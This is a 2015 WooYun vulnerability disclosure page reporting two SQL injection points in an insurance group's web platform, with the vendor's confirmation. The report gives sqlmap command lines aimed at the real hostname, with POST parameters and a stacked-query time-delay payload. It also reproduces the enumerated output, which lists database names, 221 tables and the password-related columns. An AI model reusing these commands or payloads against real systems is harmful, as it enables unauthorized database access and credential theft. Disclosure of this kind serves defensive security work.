阳光保险集团某平台2处SQL注入 | wooyun-2015-0135489| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135489

漏洞标题：阳光保险集团某平台2处SQL注入

漏洞作者：路人甲

提交时间：2015-08-20 09:55

修复时间：2015-10-04 10:12

公开时间：2015-10-04 10:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-20：细节已通知厂商并且等待厂商处理中
2015-08-20：厂商已经确认，细节仅向厂商公开
2015-08-30：细节向核心白帽子及相关领域专家公开
2015-09-09：细节向普通白帽子公开
2015-09-19：细节向实习白帽子公开
2015-10-04：细节向公众公开

简要描述：

如题

详细说明：

阳光保险集团云平台两处前台sql注入
1.注入点1：
登录处：

c:\Python27\sqlmap>sqlmap.py -u "http://ygjrex.sinosig.com/tabid/161/Default.aspx?returnurl=%2fdefault.aspx" --data="u_al=login&u_n=admin&u_p=admin123&u_r=0&_=0.33639599406160414" -p u_n

u_n参数存在延时注入

POST parameter 'u_n' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N] N
sqlmap identified the following injection points with a total of 88 HTTP(s) requ
ests:
---
Parameter: u_n (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: u_al=login&u_n=admin';WAITFOR DELAY '0:0:5'--&u_p=admin123&u_r=0&_=
0.33639599406160414
---

2.注入点2：
找回密码处

sqlmap.py -u "http://ygjrex.sinosig.com/http://ygjrex.sinosig.com/tabid/193/Default.aspx" --data="actionType=ecode&email=a@a.com&surl=http://ygjrex.sinosig.com/?TabId=193" -p email

报错注入，可以快速提取数据

漏洞证明：

使用注入点2获取的少量信息：
数据库：

available databases [22]:
[*] fcdb
[*] km15b
[*] km_14
[*] km_15
[*] km_bjh
[*] km_gdym
[*] km_lhsz
[*] master
[*] meisizixun
[*] model
[*] msdb
[*] pfps
[*] pfps_cuspro
[*] pfps_customer
[*] pfps_plan
[*] pfpsata
[*] pfpsproduct
[*] tempdb
[*] water_crm
[*] waterh2_py
[*] ygbx
[*] zhongmeizhihui

表：

[221 tables]
+---------------------------------------------+
| Affiliates                                  |
| AnonymousUsers                              |
| BRCB_APPDeviceInfo                          |
| BRCB_AccessroyPath                          |
| BRCB_Answer                                 |
| BRCB_Attach                                 |
| BRCB_Buffet                                 |
| BRCB_CCUserInfo                             |
| BRCB_Category                               |
| BRCB_ClassInfo                              |
| BRCB_Class_User_Record                      |
| BRCB_Collect                                |
| BRCB_Comment                                |
| BRCB_Course                                 |
| BRCB_CourseBox                              |
| BRCB_CourseQuestionInstance                 |
| BRCB_CourseRecord                           |
| BRCB_Department                             |
| BRCB_Dictionary                             |
| BRCB_ErrorQuestion                          |
| BRCB_Integral                               |
| BRCB_Log                                    |
| BRCB_MobilePush                             |
| BRCB_MobileSuggest                          |
| BRCB_MobileVersion                          |
| BRCB_NewsMessage                            |
| BRCB_NewsMessageRecord                      |
| BRCB_Notice                                 |
| BRCB_NoticeInfo                             |
| BRCB_NoticePush                             |
| BRCB_OrgPosition                            |
| BRCB_Organization                           |
| BRCB_Paper                                  |
| BRCB_PaperInstance                          |
| BRCB_PaperInstance_Lastest                  |
| BRCB_PayRecord                              |
| BRCB_Question                               |
| BRCB_QuestionInstance                       |
| BRCB_Questionnaire                          |
| BRCB_QuestionnaireAnswer                    |
| BRCB_QuestionnaireQuestion                  |
| BRCB_QuestionnaireRecord                    |
| BRCB_R_Admin_User                           |
| BRCB_R_Attach_CCUserInfo                    |
| BRCB_R_Class_CourseBox                      |
| BRCB_R_Class_Paper                          |
| BRCB_R_Class_User                           |
| BRCB_R_Course_CourseBox                     |
| BRCB_R_Course_Question                      |
| BRCB_R_Course_User                          |
| BRCB_R_OrgPosition_CourseBox                |
| BRCB_R_OrgPosition_Paper                    |
| BRCB_R_Paper_Question                       |
| BRCB_R_Paper_User                           |
| BRCB_R_UserGroup_CourseBox                  |
| BRCB_R_UserGroup_Paper                      |
| BRCB_R_User_CourseRating                    |
| BRCB_R_User_Group                           |
| BRCB_R_User_Questionnaire                   |
| BRCB_R_User_Region                          |
| BRCB_ShieldWords                            |
| BRCB_SystemAdmin                            |
| BRCB_SystemSetting                          |
| BRCB_User                                   |
| BRCB_UserGroup                              |
| BRCB_UserMap                                |
| BRCB_VerifyCode                             |
| Banners                                     |
| C_InfoCategory                              |
| C_InfoExtFiled                              |
| C_InfoExtValue                              |
| C_InfoItemRole                              |
| C_InfoModuleInfos                           |
| C_InfoPage                                  |
| C_InfoSpec                                  |
| C_InfoSpecInfo                              |
| C_InfoVersions                              |
| C_info                                      |
| C_infoKeyword                               |
| C_infoLink                                  |
| C_infoRemark                                |
| Classification                              |
| Client_View_BRCB_User_CourseBox_Course      |
| Client_View_BRCB_User_TestPaper             |
| DesktopModules                              |
| EventLog                                    |
| EventLogConfig                              |
| EventLogTypes                               |
| Files                                       |
| FolderPermission                            |
| Folders                                     |
| HostSettings                                |
| HtmlText                                    |
| Lists                                       |
| ModuleControls                              |
| ModuleDefinitions                           |
| ModulePermission                            |
| ModuleSettings                              |
| Modules                                     |
| MyDesktopLayout                             |
| Permission                                  |
| PortalAlias                                 |
| PortalDesktopModules                        |
| Portals                                     |
| Profile                                     |
| ProfilePropertyDefinition                   |
| RoleGroups                                  |
| Roles                                       |
| Schedule                                    |
| ScheduleHistory                             |
| ScheduleItemSettings                        |
| SearchCommonWords                           |
| SearchIndexer                               |
| SearchItem                                  |
| SearchItemWord                              |
| SearchItemWordPosition                      |
| SearchWord                                  |
| SiteLog                                     |
| Skins                                       |
| SysDictionary                               |
| SystemMessages                              |
| TabModuleSettings                           |
| TabModules                                  |
| TabPermission                               |
| Tabs                                        |
| UManage_FavoriteCategory                    |
| UManage_MyFavorites                         |
| UrlLog                                      |
| UrlTracking                                 |
| Urls                                        |
| UserPortals                                 |
| UserProfile                                 |
| UserRoles                                   |
| Users                                       |
| UsersOnline                                 |
| VendorClassification                        |
| Vendors                                     |
| Version                                     |
| View_BECB_Questiong_ON_Category_PaperCount  |
| View_BECB_R_Course_CourseBoxAndBRCB_Course  |
| View_BRCB_Category_Statistics               |
| View_BRCB_CourseAndBRCB_Category            |
| View_BRCB_CourseBoxAndBRCB_Category         |
| View_BRCB_CourseBox_Integration             |
| View_BRCB_CourseKekan                       |
| View_BRCB_Department                        |
| View_BRCB_IntegralMore                      |
| View_BRCB_Organization                      |
| View_BRCB_PaperZhengchang                   |
| View_BRCB_Paper_ON_Category                 |
| View_BRCB_Paper_User_Assign_Record          |
| View_BRCB_Question_ON_Category              |
| View_BRCB_Question_ON_Paper                 |
| View_BRCB_R_Attach_CCUserInfo               |
| View_BRCB_R_Course_QuestionAndBRCB_Question |
| View_BRCB_R_Course_UserAndBRCB_User         |
| View_BRCB_R_OrgPosition_CourseBox           |
| View_BRCB_R_OrgPosition_Paper               |
| View_BRCB_R_UserGroup_CourseBox             |
| View_BRCB_R_UserGroup_Paper                 |
| View_BRCB_R_User_Group                      |
| View_BRCB_StatisticsOrgCategoryCourse       |
| View_BRCB_StatisticsOrgCategoryPaper        |
| View_BRCB_StatisticsOrgCourse               |
| View_BRCB_StatisticsOrgCourseCategoryRecord |
| View_BRCB_StatisticsOrgUserPaper            |
| View_BRCB_StatisticsOrgUserRecord           |
| View_BRCB_StatisticsUser                    |
| View_BRCB_Universal                         |
| View_BRCB_User                              |
| View_Category_CourseCount                   |
| View_Category_Indxe_StudyInfo               |
| View_Collect_CourseBox                      |
| View_CourseBox_Distribution_Record          |
| View_CourseRecord_LastTime                  |
| View_CourseSigned                           |
| View_NewMessage_Comment_Readed              |
| View_NoticeInfo                             |
| View_Notice_And_Paperinstance_Coures        |
| View_PaperListByQuestionId                  |
| View_Paper_R_User                           |
| View_TestCount                              |
| View_TopTenCourse                           |
| View_UserNewInfo                            |
| View_UserStatistics                         |
| View_User_R_Paper                           |
| WorkflowDef                                 |
| aspnet_Applications                         |
| aspnet_Membership                           |
| aspnet_Profile                              |
| aspnet_Roles                                |
| aspnet_SchemaVersions                       |
| aspnet_Users                                |
| aspnet_UsersInRoles                         |
| provicetemp                                 |
| sysdiagrams                                 |
| tbl_province                                |
| vw_Client_CourseList                        |
| vw_Client_PackageList                       |
| vw_Client_UserPackageList                   |
| vw_CourseRecord                             |
| vw_FolderPermissions                        |
| vw_Lists                                    |
| vw_ModulePermissions                        |
| vw_Modules                                  |
| vw_Portals                                  |
| vw_TabPermissions                           |
| vw_Tabs                                     |
| vw_UManageFavorites                         |
| vw_UManageMyPublishArticles                 |
| vw_UManagePassedArticles                    |
| vw_UManageWaitAuditArticles                 |
| vw_Users                                    |
| vw_aspnet_Applications                      |
| vw_aspnet_MembershipUsers                   |
| vw_aspnet_Profiles                          |
| vw_aspnet_Roles                             |
| vw_aspnet_Users                             |
| vw_aspnet_UsersInRoles                      |
| wfActive                                    |
| wfTrace                                     |
+---------------------------------------------+

查询出含有password列的表

Table: BRCB_UserMap
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| PassWord | nvarchar |
+----------+----------+
Database: ygbx
Table: vw_Users
[1 column]
+----------------+------+
| Column         | Type |
+----------------+------+
| UpdatePassword | bit  |
+----------------+------+
Database: ygbx
Table: aspnet_Membership
[10 columns]
+----------------------------------------+----------+
| Column                                 | Type     |
+----------------------------------------+----------+
| FailedPasswordAnswerAttemptCount       | int      |
| FailedPasswordAnswerAttemptWindowStart | datetime |
| FailedPasswordAttemptCount             | int      |
| FailedPasswordAttemptWindowStart       | datetime |
| LastPasswordChangedDate                | datetime |
| Password                               | nvarchar |
| PasswordAnswer                         | nvarchar |
| PasswordFormat                         | int      |
| PasswordQuestion                       | nvarchar |
| PasswordSalt                           | nvarchar |
+----------------------------------------+----------+
Database: ygbx
Table: vw_Portals
[1 column]
+-------------------+----------+
| Column            | Type     |
+-------------------+----------+
| ProcessorPassword | nvarchar |
+-------------------+----------+
Database: ygbx
Table: Portals
[1 column]
+-------------------+----------+
| Column            | Type     |
+-------------------+----------+
| ProcessorPassword | nvarchar |
+-------------------+----------+
Database: ygbx
Table: vw_aspnet_MembershipUsers
[8 columns]
+----------------------------------------+----------+
| Column                                 | Type     |
+----------------------------------------+----------+
| FailedPasswordAnswerAttemptCount       | int      |
| FailedPasswordAnswerAttemptWindowStart | datetime |
| FailedPasswordAttemptCount             | int      |
| FailedPasswordAttemptWindowStart       | datetime |
| LastPasswordChangedDate                | datetime |
| PasswordAnswer                         | nvarchar |
| PasswordFormat                         | int      |
| PasswordQuestion                       | nvarchar |
+----------------------------------------+----------+
Database: ygbx
Table: Users
[1 column]
+----------------+------+
| Column         | Type |
+----------------+------+
| UpdatePassword | bit  |
+----------------+------+

修复方案：

数据没拖，自行修复

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-08-20 10:11

厂商回复：

感谢提交，此站点未在公司机房，应该为分支部门自行搭建的应用，正在联系负责人

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135489

漏洞标题：阳光保险集团某平台2处SQL注入

相关厂商：阳光保险集团

漏洞作者：路人甲

提交时间：2015-08-20 09:55

修复时间：2015-10-04 10:12

公开时间：2015-10-04 10:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0135489

漏洞标题：阳光保险集团某平台2处SQL注入

相关厂商：阳光保险集团

漏洞作者： 路人甲

提交时间：2015-08-20 09:55

修复时间：2015-10-04 10:12

公开时间：2015-10-04 10:12

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0135489"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云